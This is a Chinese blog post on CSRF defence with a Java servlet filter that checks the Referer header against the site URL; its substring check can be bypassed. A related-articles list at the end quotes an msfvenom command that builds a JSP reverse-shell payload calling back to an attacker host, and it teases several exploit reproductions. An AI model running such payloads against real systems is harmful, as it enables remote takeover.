Web系統csrf漏洞攻防

原創 百里慕溪 2020-06-11 17:21

前言

csrf 漏洞是配合xss漏洞對web系統進行滲透攻擊的,或者是攻擊者構造一個惡意的請求,例如 http://www.test.com/help.html 如果目標 web 系統存在 csrf 漏洞,並且系統管理員已經登錄,那麼攻擊者可以誘騙管理員點擊 http://www.test.com/help.html 這個鏈接,這時候攻擊方相當於盜用了管理員的身份來進行操作,而且管理員絲毫未察覺,這個攻擊就已經完成了,風險可想而知。

解決方案

可以對指向服務器的請求的請求頭中的referer進行校驗,判斷當前erferer是否是來自本網站,如果不是則定爲非法訪問,直接拒絕,具體做法是寫一個全局過濾器,廢話不多說,直接上代碼:

過濾器 RefererFilter:

package com.common.filter;

import java.io.IOException;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.apache.log4j.LogManager;
import org.apache.log4j.Logger;

/**
 * @ClassName: RefererFilter
 * @Description: 過濾非本站請求, 防止csrf跨站請求僞造進行攻擊
 * @author weny.yang
 */
public class RefererFilter implements Filter {
	private static final Logger logger = LogManager.getLogger(RefererFilter.class);

	public void init(FilterConfig filterconfig1) throws ServletException {
		
	}
	
        public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain) throws     IOException, ServletException {
		HttpServletRequest request = (HttpServletRequest) req;
		HttpServletResponse response = (HttpServletResponse) res;
		
		//請求url
                String url = request.getServletPath();  
		//請求來源標識
		String referer = request.getHeader("referer");
		String webPath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getContextPath()+"/";
		//攔截所有不是來自本網站的非靜態資源請求
		if(url.contains("/servlet/") && (null==referer || (null!=referer && !referer.contains(webPath)))) {
			logger.info("非法盜鏈請求被攔截,Referer= " + referer + " 目標Url= " + url);
			return;
		}
		chain.doFilter(request, response);
	}
	public void destroy() {
		
	}

}

web.xml 配置:

<!-- 過濾非本站請求,防止csrf跨站請求僞造進行攻擊 -->
<filter>
	<filter-name>RefererFilter</filter-name>
	<filter-class>com.common.filter.RefererFilter</filter-class>
</filter>
<filter-mapping>
	<filter-name>RefererFilter</filter-name>
	<url-pattern>/*</url-pattern>
</filter-mapping>

本文過濾器是基於比較傳統的老項目,內部具體過濾邏輯請根據自己實際項目情況變更。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

CVE-2020-1938(RCE利用)

CVE-2020-1938(RCE利用) 1.使用msf生成反彈shell馬,並且監聽 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R >

陈玄都 2020-07-07 19:56:42

Apache Tomcat任意文件讀取漏洞POC測試(CVE-2020-1938)

Apache Tomcat任意文件讀取漏洞POC測試(CVE-2020-1938) 1.背景 Tomcat是由Apache軟件基金會屬下Jakarta項目開發的Servlet容器,按照Sun Microsystems提供的技術規範,實現了

陈玄都 2020-07-07 19:56:42

Apache Solr 遠程命令執行漏洞(CVE-2019-0193)

Apache Solr 遠程命令執行漏洞(CVE-2019-0193) 聲明:本篇文章僅限用於學習信息安全技術,請勿用於非法途徑! 1.漏洞描述 2019年8月1日,Apache Solr官方發佈了CVE-2019-0193漏洞預警,漏洞

陈玄都 2020-07-07 19:56:31

ApacheShiro1.2.4反序列化漏洞復現(CVE-2016-4437)

前言: Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。 影響版本: Apache Shiro <= 1.2.4 漏洞原理: Apache Sh

cj_hydra 2020-07-05 14:17:12

使用Ngrok來進行內網端口轉發

前言: 在學習了網絡安全之後,我們知道了公網和私網(內網),私網是不能直接在公網傳輸和通信的。比如一個學校,一個公司,都是單獨在自己的私網裏面,通過這個私網內部的路由器(NAPT方式)和外界通信。那麼如果A公司的員工要和B公司的員

cj_hydra 2020-07-05 14:17:12

phpMyAdmin(LOAD DATA INFILE) 任意文件讀取漏洞

phpMyAdmin開啓遠程登陸導致本地文件讀取 下面我們先去分析復現下這個漏洞。 $cfg['AllowArbitraryServer'] = true; //false改爲true 則登錄時就可以訪問遠程的服務器。當登陸一個

cj_hydra 2020-07-05 14:17:12

reGeorg+Proxifier實現http代理(windows下)

利用方式: 工具: reGeory 下載地址:https://github.com/sensepost/reGeorg Proxifier 下載地址:https://www.proxifier.com 第一步:將tunnel.no

cj_hydra 2020-07-05 14:17:12

kali安裝docker說明

第一步: 使用kali安裝docker非常簡單。 只需要幾條命令。 首先添加更新源,來到位置/etc/apt/sources.list 通過vim進行編輯後添加如下源: > deb http://mirrors.zju.edu.c

cj_hydra 2020-07-05 14:17:12

ActiveMQ漏洞(CVE-2016-3088)利用總結——未完

前言: Apache ActiveMQ是美國阿帕奇(Apache)軟件基金會所研發的一套開源的消息中間件,它支持Java消息服務、集羣、Spring Framework等。隨着中間件的啓動,會打開兩個端口,61616是工作端口,消

cj_hydra 2020-07-05 14:17:12

cve-2020-1938漏洞復現

前言: Tomcat Connector 是 Tomcat 與外界連接的通道,使得它與 Catalina 能夠接收外部的請求,傳遞給對應的 Web 應用程序處理,並返回對應的請求結果。 Tomcat默認的 conf/server.

cj_hydra 2020-07-05 14:17:12

Apache2配置目錄分析

前言: 這裏apache2是Ubuntu下發行的架構網站的版本,apache2和apache有點不同,包括配置文件名的不同等。接下來我將演示Apache2的基本配置與一些細節。 方法: 由於這裏是Ubuntu環境,安裝的方式直接就

cj_hydra 2020-07-05 14:17:12

JBoss反序列化漏洞(CVE-2017-12149)

前言: JBoss 反序列化漏洞,該漏洞位於JBoss的HttpInvoker組件中的 ReadOnlyAccessFilter 過濾器中,其doFilter方法在沒有進行任何安全檢查和限制的情況下嘗試將來自客戶端的序列化數據流進

cj_hydra 2020-07-05 14:17:12

談談log4j的反序列化

文章發佈在安全客:https://www.anquanke.com/post/id/195932

灰色世界的阿信 2020-07-04 15:10:42

灰盒方式通關WebGoat 8

SQL Injection (intro) 0x02 select department from employees where first_name='Bob'; 0x03 update employees set depar

灰色世界的阿信 2020-07-04 15:10:42

xdebug的一些攻擊面

前言 偶然看到一篇關於利用xdeubg執行命令的文章,覺得挺有意思的,簡單復現一下利用過程,做一個記錄,原理性的東西就不多講了 原理簡介 xdebug是調試php代碼的工具,遵循DBGp協議。其工作原理大概如下(搬運): ID

灰色世界的阿信 2020-07-04 15:10:42